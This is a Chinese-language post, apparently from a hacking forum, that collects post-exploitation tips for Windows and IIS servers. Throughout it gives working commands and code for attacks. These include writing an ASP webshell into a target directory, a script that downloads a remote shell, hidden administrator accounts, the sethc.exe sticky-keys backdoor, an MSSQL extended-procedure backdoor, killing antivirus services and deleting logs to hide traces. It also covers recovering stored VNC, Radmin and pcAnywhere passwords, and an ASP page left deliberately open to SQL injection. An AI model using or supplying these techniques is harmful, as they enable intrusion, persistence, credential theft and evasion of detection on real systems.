渗透技巧总结

本着共享之精神,方便各位黑阔童鞋,发表此文,希望抛砖引玉,童鞋们踊跃发言。使之更加完善,在交流中进步,形成良好的互动~
旁站路径问题    1、读网站配置。      2、用以下VBS
On Error Resume Next
If (LCase(Right(WScript.Fullname,11))=”wscript.exe”) Then
Msgbox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & “
Usage:Cscript vWeb.vbs”,4096,”Lilo”
WScript.Quit
End If
Set ObjService=GetObject
(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name)
Then
Set OService=GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err
<> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[” &
OService.ServerComment & “]”
For Each Binds In OService.ServerBindings
Web = “{ ” & Replace(Binds,”:”,” } { “) & ” }”
WScript.Echo Replace(Split(Replace(Web,” “,””),”}{“)(2),”}”,””)
Next
WScript.Echo “Path            : ” & VDirObj.Path
End If
Next
复制代码
3、iis_spy列举(注:需要支持ASPX,反IISSPY的方法:将activeds.dll,activeds.tlb降权)
4、得到目标站目录,不能直接跨的。通过echo  ^<%execute(request(“cmd”))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
—————————————————————
WordPress的平台,爆绝对路径的方法是:url/wp-content/plugins/akismet/akismet.php     url/wp-content/plugins/akismet/hello.php
——————————————————————
phpMyAdmin暴路径办法:phpMyAdmin/libraries/select_lang.lib.php     phpMyAdmin/darkblue_orange/layout.inc.php     phpMyAdmin/index.php?lang[]=1     phpmyadmin/themes/darkblue_orange/layout.inc.php
————————————————————
网站可能目录(注:一般是虚拟主机类)data/htdocs.网站/网站/
————————————————————
CMD下操作VPN相关:netsh ras set user administrator permit #允许administrator拨入该VPN     netsh ras set user administrator deny #禁止administrator拨入该VPN     netsh ras show user #查看哪些用户可以拨入VPN     netsh ras ip show config #查看VPN分配IP的方式     netsh ras ip set addrassign method = pool #使用地址池的方式分配IP     netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
————————————————————
命令行下添加SQL用户的方法:需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:exec master.dbo.sp_addlogin test,123    EXEC sp_addsrvrolemember ‘test, ‘sysadmin’     然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
另类的加用户方法:在删掉了net.exe和不用adsi之外,新的加用户的方法。代码如下:
js:
var o=new ActiveXObject( “Shell.Users” );
z=o.create(“test”) ;
z.changePassword(“123456″,””)
z.setting(“AccountType”)=3;
vbs:
Set   o=CreateObject( “Shell.Users” )
Set z=o.create(“test”)
z.changePassword “123456”,””
z.setting(“AccountType”)=3
——————————————————
cmd访问控制权限控制(注:反everyone不可读,工具-文件夹选项-使用简单的共享去掉即可)
命令如下
cacls c: /e /t /g everyone:F           #c盘everyone权限
cacls “目录” /d everyone               #everyone不可读,包括admin
————————以下配合PR更好————
3389相关
a、防火墙TCP/IP筛选.(关闭net stop policyagent & net stop sharedaccess)
b、内网环境(LCX)
c、终端服务器超出了最大允许连接
XP 运行mstsc /admin
2003 运行mstsc /console
杀软关闭(把杀软所在的文件的所有权限去掉)
处理变态诺顿企业版:
net stop “Symantec AntiVirus” /y
net stop “Symantec AntiVirus Definition Watcher” /y
net stop “Symantec Event Manager” /y
net stop “System Event Notification” /y
net stop “Symantec Settings Manager” /y
卖咖啡:net stop “McAfee McShield”
————————————————————
5次SHIFT:
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
——————————————————————
隐藏账号添加:
1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
2、导出注册表SAM下用户的两个键值
3、在用户管理界面里的admin$删除,然后把备份的注册表导回去。
4、利用Hacker Defender把相关用户注册表隐藏
——————————————————————
MSSQL扩展后门:
USE master;
EXEC sp_addextendedproc ‘xp_helpsystem’, ‘xp_helpsystem.dll’;
GRANT exec On xp_helpsystem TO public;
———————————————————————
日志处理
C:\WINNT\system32\LogFiles\MSFTPSVC1>下有
ex011120.log / ex011121.log / ex011124.log三个文件,直接删除 ex0111124.log   不成功,“原文件…正在使用”当然可以直接删除ex011120.log / ex011121.log    用记事本打开ex0111124.log,删除里面的一些内容后,保存,覆盖退出,成功。当停止msftpsvc服务后可直接删除ex011124.log
MSSQL查询分析器连接记录清除:
MSSQL 2000位于注册表如下:HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers找到接接过的信息删除。MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL
Server\90\Tools\Shell\mru.dat
—————————————————————————
防BT系统拦截可使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了)
<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject(“Microsoft.XMLHTTP”)
With Retrieval
.Open “Get”, s_RemoteFileUrl, False, “”, “”
.Send
GetRemoteData = .ResponseBody
End With
Set Retrieval = Nothing
Set Ads = Server.CreateObject(“Adodb.Stream”)
With Ads
.Type = 1
.Open
.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
.Close()
End With
Set Ads=nothing
End Sub
eWebEditor_SaveRemoteFile”your shell’s name”,”your shell’urL”
%>
VNC提权方法:利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解     注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
Radmin 默认端口是4899,HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置,然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过PCANYWHERE从本机登陆服务器。
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下,那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。
——————————————————————
搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
——————————————————————
WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式下下来,看路径,访问 路径\web传shell,访问shell后,权限是system,放远控进启动项,等待下次重启。没有删cmd组建的直接加用户。7i24的web目录也是可写,权限为administrator。
1433 SA点构建注入点。
<%
strSQLServerName = “服务器ip”
strSQLDBUserName = “数据库帐号”
strSQLDBPassword = “数据库密码”
strSQLDBName = “数据库名称”
Set conn = Server.createObject(“ADODB.Connection”)
strCon = “Provider=SQLOLEDB.1;Persist Security Info=False;Server=” & strSQLServerName &
“;User ID=” & strSQLDBUserName & “;Password=” & strSQLDBPassword & “;Database=” &
strSQLDBName & “;”
conn.open strCon
dim rs,strSQL,id
set rs=server.createobject(“ADODB.recordset”)
id = request(“id”)
strSQL = “select * from ACTLIST where worldid=” & idrs.open strSQL,conn,1,3
rs.close
%>
本文摘自网络由网络安全(www.91ri.org)收集整理.